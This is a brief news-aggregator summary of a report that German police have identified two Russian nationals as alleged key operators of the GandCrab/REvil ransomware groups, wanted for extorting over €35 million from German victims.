2026-04-07 | TechRadar: Goodnight REvil and GandCrab? Police think they've identified two of the biggest cybercrime bosses around

German police have identified two Russian nationals, Daniil Maksimovich Shchukin and Anatoly Sergeevich Kravchuk, as key operators of the GandCrab/REvil ransomware groups. They are sought for extorting over €35 million from 130 German victims between early 2019 and July 2021. The authorities believe they are currently in Russia and are asking the public for assistance in locating them. GandCrab was a major ransomware player, operating under a Ransomware-as-a-Service model, before its shutdown in mid-2019.

Information Security News | AI Aggregator